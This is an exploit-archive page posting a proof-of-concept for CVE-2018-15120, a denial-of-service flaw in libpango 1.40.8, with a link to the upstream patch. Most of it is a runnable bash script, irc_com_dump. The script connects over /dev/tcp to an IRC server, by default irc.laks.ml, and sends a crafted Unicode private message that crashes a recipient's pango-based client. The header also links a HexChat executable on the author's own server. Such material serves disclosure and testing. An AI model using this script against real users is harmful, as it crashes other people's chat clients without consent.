exploit the possibilities

Libpango 1.40.8 Denial Of Service

Libpango 1.40.8 Denial Of Service
Posted Aug 27, 2018
Authored by Jeffery M

Libpango version 1.40.8 suffers from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2018-15120
MD5 | 7583b00a9838fee5a89fdc248739a3ec

Libpango 1.40.8 Denial Of Service

Change Mirror Download
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120

# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f

# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.

# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:

irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'

This is a rudimentary example of how this attack can be used.

#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;

}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi


# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL


export allargs=("$@")
#test_ping ()
#{
# if [[ ! -n $PING ]]; then
# export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
# fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi

export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
export name=magicdebug
fi
run_irc_com ()
{
set -vx
echo ${allargs[1]}
# if ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] && [[ ! ${allargs[0]} =~ .*[.].*
]] || true) ) ) ; then
if [[ ! ${allargs[0]} =~ .*[.].* && ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
export COMM="$@";
else
export s=$1
export p=$2
export COMM="${@:3}"
if [[ $p =~ .*[a-zA-Z] ]] ; then
unset s p
export COMM="${allargs[@]}"
fi
fi

test -z $s||false && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
if [[ ! -n $PING ]]; then
export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
fi;
## test_ping;
echo -e "${PING}\n" 1>&5
if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
export PINGSENT=isentmyping;
fi;
if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
echo "$h" 2>&1;
done

}

run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name " '{print $2}'

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close